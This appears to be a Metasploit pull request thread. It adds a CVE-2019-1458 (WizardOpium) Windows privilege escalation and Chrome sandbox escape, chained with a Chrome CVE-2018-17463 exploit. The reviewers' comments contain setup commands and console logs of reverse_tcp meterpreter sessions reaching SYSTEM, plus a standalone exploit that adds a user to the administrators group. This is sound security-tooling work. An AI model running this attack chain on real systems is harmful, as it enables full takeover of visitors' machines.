CVE-2019-1458 chrome sandbox escape

[timwr]

This pull request demonstrates how #13221 (aka WizardOpium?)
can be combined with any chrome exploit (in this case https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/chrome_object_create.rb) in order to escape the sandbox.

Verification

Install Google Chrome 69.0.3497.92 on Windows 7 SP1

• Start msfconsole
• use exploit/multi/browser/chrome_object_create
• set target 1
• set URIPATH /
• set payload windows/x64/meterpreter/reverse_tcp
• set LHOST 192.168.56.1
• set SRVHOST 192.168.56.1
• set DEBUG_EXPLOIT true
• run
• Visit the URL with Chrome
• Verify you get a meterpreter shell as SYSTEM

e.g:

msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.6     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 192.168.56.6     chrome_object_create - [*] Properties p6 and p27 overlap after conversion to dictionary mode
[*] 192.168.56.6     chrome_object_create - [*] ArrayBuffer @ 0x7aed4e9ef20
[*] 192.168.56.6     chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 192.168.56.6     chrome_object_create - Sent stage2 exploit (20000 bytes)
[*] 192.168.56.6     chrome_object_create - [*] payload addr: 0x7e86fc1c000
[*] 192.168.56.6     chrome_object_create - [*] wasm_addr @ 0x78ab777cd98
[*] 192.168.56.6     chrome_object_create - [*] wasm_rwx @ 0x4fb2c1b0000
[*] 192.168.56.6     chrome_object_create - [*] div_addr @ 0xefd1c7da00
[*] 192.168.56.6     chrome_object_create - [*] el_addr @ 0x7b9545631f8
[*] 192.168.56.6     chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:49159) at 2020-07-07 18:25:56 +0800


msf5 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49166 (192.168.56.6)

msf5 exploit(multi/browser/chrome_object_create) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.92
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

[label-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[timwr]

This is ready now, apologies for the delay

[bcoles]

This did not work for me on Windows 7 SP1 (x64).

msf5 exploit(multi/browser/chrome_object_create) > set target 1
target => 1
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/D8go4VCD7i9I
[*] Local IP: http://172.16.191.165:8080/D8go4VCD7i9I
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /D8go4VCD7i9I to Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 172.16.191.130   chrome_object_create - Sending /D8go4VCD7i9I/payload to Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 172.16.191.130   chrome_object_create - Sent stage2 exploit (20000 bytes)

However, when I downgraded Chrome to version 69 on my test host, it looks like this, which probably doesn't bode well for any of my tests.

I downloaded old versions from here:

• https://www.slimjet.com/chrome/google-chrome-old-version.php

The installers appear to be signed by Google.

[bcoles]

I was still able to get a session using the --no-sandbox technique. However the ntusermessagecall module failed to privesc.

msf5 exploit(multi/browser/chrome_object_create) > set target 0
target => 0
msf5 exploit(multi/browser/chrome_object_create) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/HKXQRg
[*] Local IP: http://172.16.191.165:8080/HKXQRg
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /HKXQRg to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.130:49843) at 2020-07-10 07:17:27 -0400

msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 8056 launched.
[*] Injecting exploit into 8056 ...
[*] Exploit injected. Injecting payload into 8056...
[*] Payload injected. Executing exploit...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ntusermessagecall) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 x64


msf5 exploit(windows/local/ntusermessagecall) > sessions

Active sessions
===============

  Id  Name  Type                     Information       Connection
  --  ----  ----                     -----------       ----------
  1         meterpreter x64/windows  TEST\user @ TEST  172.16.191.165:4444 -> 172.16.191.130:49843 (172.16.191.130)

msf5 exploit(windows/local/ntusermessagecall) > 
msf5 exploit(windows/local/ntusermessagecall) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: TEST\user
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bcoles]

Another test with --no-sandbox , showing a non-admin user that can't privesc with getsystem, successfully elevating with ntusermessagecall :

msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Using URL: http://0.0.0.0:8080/L9NqitS20WX
[*] Local IP: http://172.16.191.165:8080/L9NqitS20WX
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 172.16.191.130   chrome_object_create - Sending /L9NqitS20WX to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.130:50067) at 2020-07-10 07:23:46 -0400

msf5 exploit(multi/browser/chrome_object_create) > use exploit/windows/local/ntusermessagecall 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 2
session => 2
msf5 exploit(windows/local/ntusermessagecall) > options

Module options (exploit/windows/local/ntusermessagecall):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PROCESS  notepad.exe      yes       Name of process to spawn and inject dll into.
   SESSION  2                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.191.165   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 x64


msf5 exploit(windows/local/ntusermessagecall) > run 

[-] Handler failed to bind to 172.16.191.165:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 4060 launched.
[*] Injecting exploit into 4060 ...
[*] Exploit injected. Injecting payload into 4060...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.130:50076) at 2020-07-10 07:24:02 -0400
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ntusermessagecall) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  2         meterpreter x64/windows  TEST\asdf @ TEST            172.16.191.165:4444 -> 172.16.191.130:50067 (172.16.191.130)
  3         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TEST  172.16.191.165:4444 -> 172.16.191.130:50076 (172.16.191.130)

msf5 exploit(windows/local/ntusermessagecall) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.191.130 - Meterpreter session 3 closed.  Reason: User exit
msf5 exploit(windows/local/ntusermessagecall) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.191.130 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/local/ntusermessagecall) > 

Using ntusermessagecall as a standalone privesc works:

[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 172.16.191.165
lport => 1337
exitonsession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.191.165:1337 
msf5 exploit(multi/handler) > [*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.130:49318) at 2020-07-10 08:06:08 -0400

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: TEST\test
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 
Background session 1? [y/N]  
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermessagecall 
s[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
emsf5 exploit(windows/local/ntusermessagecall) > set session 1
session => 1
msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 4156 launched.
[*] Injecting exploit into 4156 ...
[*] Exploit injected. Injecting payload into 4156...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 172.16.191.130
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.130:49330) at 2020-07-10 08:06:32 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bcoles]

Also Sent stage2 exploit (20000 bytes) is a lie. It should be 0x20000 (or not printed in hex), as per:

        loader_data = loader_data + "\0" * (0x20000 - loader_data.length)
        send_response(cli, loader_data, {'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
        print_good("Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)")

ie:

        print_good("Sent stage2 exploit (#{loader_data.length} bytes)")

[bcoles]

If at first you don't succeed, retry until you blue screen.

[timwr]

1. Windows NT 6.1; WOW64 is the 32bit version of chrome, you can grab the 64bit here: https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/
2. The bug is due to uninitialized memory, so you only get one chance to exploit it and subsequent attempts will fail. It's 100% reliable for me on Windows 7 SP1, but the box crashes after I exit the session and I'm not sure how to fix that.

[bcoles]

Windows NT 6.1; WOW64 is the 32bit version of chrome

I pasted the wrong log in the first comment. I realized the first test was on x86 and changed over to x64. Everything above was performed on x64.

[bcoles]

It's 100% reliable for me on Windows 7 SP1

I tried a few times, rebooting between each attempt, with no luck on Windows 7 SP1. But given that my Chrome looks like it is screaming in pain before exploitation, that doesn't mean much.

The ntusermessagecall module works well. FWIW; I was able to exploit with it even after a failed exploitation attempt via Chrome, indicating that Chrome is not attempting exploitation, given that it's exploitable only once.

[xaitax]

Was able to confirm the latest pull request on Win7x64 with Chrome 69.0.3497.100 (64bit) and PrivEsc works fine.

Furthermore tried it on Win8.1 x64 but didn't succeed.

[timwr]

@xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

[gwillcox-r7]

@timwr Not sure this is working at the moment, tried this two times with the sandbox enabled and this is basically what I got:

msf5 exploit(multi/browser/chrome_object_create) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 169.254.115.5:4444
[*] Using URL: http://169.254.115.5:8080/
[*] Server started.
msf5 exploit(multi/browser/chrome_object_create) > [*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p12 and p21 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x330bc7a40f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x27624222718
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x24616300000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x6109c9e8f70
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x6eb3a9831f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...

Then the Chrome tab crashed on the other side. Using https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.92-20074/download/ as the download source and running it on a Windows 7 x64 SP1 machine with no updates.

Here is the result if I try it with no sandbox:

msf5 exploit(multi/browser/chrome_object_create) >
[*] 169.254.133.29   chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 169.254.133.29   chrome_object_create - [*] Properties p9 and p16 overlap after conversion to dictionary mode
[*] 169.254.133.29   chrome_object_create - [*] ArrayBuffer @ 0x79edd2240f0
[*] 169.254.133.29   chrome_object_create - [*] wasm_addr @ 0x6e6fe27b528
[*] 169.254.133.29   chrome_object_create - [*] wasm_rwx @ 0x5520c4b0000
[*] 169.254.133.29   chrome_object_create - [*] div_addr @ 0x2bb8e87cb60
[*] 169.254.133.29   chrome_object_create - [*] el_addr @ 0x6ba3fcc31f8
[*] 169.254.133.29   chrome_object_create - [*] Triggering...
[*] Sending stage (201283 bytes) to 169.254.133.29
[*] Meterpreter session 2 opened (169.254.115.5:4444 -> 169.254.133.29:49159) at 2020-08-28 15:25:16 -0500

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: test-PC\test
meterpreter >

[gwillcox-r7]

@xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

Taking a look at this now, will let you know what the results are.

Dismissing review as we were unable to reproduce the exploit, and this leads to the misleading conclusion that this code is ready to land.

[gwillcox-r7]

@xaitax / anyone: I don't suppose you can run https://github.com/unamer/CVE-2019-1458/tree/master/x64/Release <-- this exe on your Windows 8.1 box and post the output? I suspect it just needs offsets but I don't have a VM to test on at the moment.

Results:

C:\Users\low\Desktop>cve-2019-1458.exe
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
Usage: cve-2019-1458.exe command
Example: cve-2019-1458.exe "net user admin admin /ad & net user localgroup admin
istrators admin /ad"

WARNING: YOU ONLY HAVE ONE CHANCE!!!
C:\Users\low\Desktop>net user admin admin /ad
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net user

User accounts for \\TEST

-------------------------------------------------------------------------------
Administrator            Guest                    low
user
The command completed successfully.

C:\Users\low\Desktop>net user admin admin /add
System error 5 has occurred.

Access is denied.

C:\Users\low\Desktop>net user admin admin /ad
System error 5 has occurred.

Access is denied.

C:\Users\low\Desktop>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the compu
ter/domain

Members

-------------------------------------------------------------------------------
Administrator
user
The command completed successfully.


C:\Users\low\Desktop>net localgroup administrators admin /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>net localgroup administrators low /add
System error 5 has occurred.

Access is denied.


C:\Users\low\Desktop>cve-2019-1458.exe "net localgroup administrators low /add"
CVE-2019-1458 exploit by @unamer(https://github.com/unamer)
[*] tagWND: 0xFFFFF90140823A70, tagCLS:0xFFFFF901408209C0, gap:0x30b0
[*] Registering window
[*] Creating instance of this window
[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window 0x0000000000040066
[*] Calling SetWindowLongPtr to set window extra data, that will be later derefe
renced
[*] GetLastError = 0
[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0
x130
[*] Simulating alt key press
[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second
 time
[*] tagWND: 0xFFFFF9014081A370
[+] Exploit success!
[*] Trying to execute net localgroup administrators low /add as SYSTEM
[+] ProcessCreated with pid 2388!
===============================
The command completed successfully.


C:\Users\low\Desktop>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the compu
ter/domain

Members

-------------------------------------------------------------------------------
Administrator
low
user
The command completed successfully.


C:\Users\low\Desktop>

This shows that this succeeds in adding the low user to the administrators group (before low was just a normal user).

[timwr]

Apologies but I implemented this change: e9ef1bb without updating the instructions.
@gwillcox-r7 did you test with set target 1 or the default?

[gwillcox-r7]

@timwr I think I probably tried the default options. I used the testing instructions so most likely I didn't use the set target 1 option. Sorry! I'll try retest this again with that option.

[gwillcox-r7]

Overall looks pretty good, but did have a few questions and comments on the module. Apologies in advance if I misunderstood anything, this was intended to be a complete review to prune out any potential odd behavior.

[gwillcox-r7]

@timwr Going to work on making the changes necessary to fix up the rest of these issues today, so if you see any commits to your branch this is what they are related to.

[gwillcox-r7]

@timwr Just realized after all of this that the documentation for exploits/multi/browser/chrome_object_create.rb will also need to be updated now that we added in extra options and since the line we have in that documentation about **This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option** is no longer applicable.

[timwr]

The changes you made look great! I re-tested it again with target 1 and it works. I will update the documentation with the results. Thanks @gwillcox-r7 !

[gwillcox-r7]

Minor changes required, otherwise this is pretty much ready to go. Left some comments for reference but I can go ahead and make these edits myself.

[gwillcox-r7]

Eh technically speaking this implies that this value will always be 0. Minor complaint though. Main thing I am noticing when looking at this documentation is that we don't have an Options section. So I was a little confused at first why we didn't list the various options for target and explain what they did. Might be an idea to add that in to this documentation file to bring it up to date.

Otherwise changes on this look good, thanks for doing this!

[gwillcox-r7]

These lines look great but my concern is that you have individual lines that are way too long, when they should be broken up into multiple lines (even if they are within the same sentence). Can you run tools/dev/msftidy_docs.rb on this file and try address some of the concerns it raises? It should note a few things such as long lines like these that can be tidied up to help make the documentation easier to read.

[timwr]

@gwillcox-r7 I've addressed most of the msftidy_docs issues, but I still get the following:

documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] Docs should start with ## Vulnerable Application
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] Missing Section: ## Options
documentation/modules/exploit/multi/browser/chrome_object_create.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/multi/browser/chrome_object_create.md:22 - [WARNING] Line too long (153). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.

I'm not sure about the remaining ones:

1. The docs start with a description (not ## Vulnerable Application), as does the module_doc_template.md and every other doc.
2. There are no non-standard options that need to be documented, so I left out ## Options
3. See 1).
4. There is no way to split up this hyperlink into multiple lines.

[gwillcox-r7]

@timwr The template is a bit old and may not have been updated. I think we now just generally place that description section under ## Vulnerable Application. As for point 2, that is a known issue with the script as we have it at the moment, and normally I would ignore it, however there is still value in documenting your various Target options here. I will do this so long. As for point 3, that is a consequence of point 1. And finally point 4 can be safely ignored, we will potentially be looking at a fix for this in the future as it is a known issue of our checks but right now its not anything that will break expectations.

Edit: Wow I completely overlooked the fact that we already documented the Targets option later on....I'll add this section in just for compliance purposes and write a small description to match.

[gwillcox-r7]

@timwr With last updates this should be ready to land, so going to just go ahead and do some rebasing to clear up the commit history and then land this in. Thanks for your patience on this!

[gwillcox-r7]

Original Release Notes

This PR adds support for exploiting CVE-2019-1458, aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the exploit/multi/browser/chrome_object_create.rb module that exploits CVE-2018-17463 in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.

[pbarry-r7]

Release Notes

New module exploit/windows/local/cve_2019_1458_wizardopium can be used as a standalone local exploit for CVE-2019-1458 (aka WizardOpium) to achieve LPE on vulnerable Windows targets or as a sandbox escape option with exploit/multi/browser/chrome_object_create.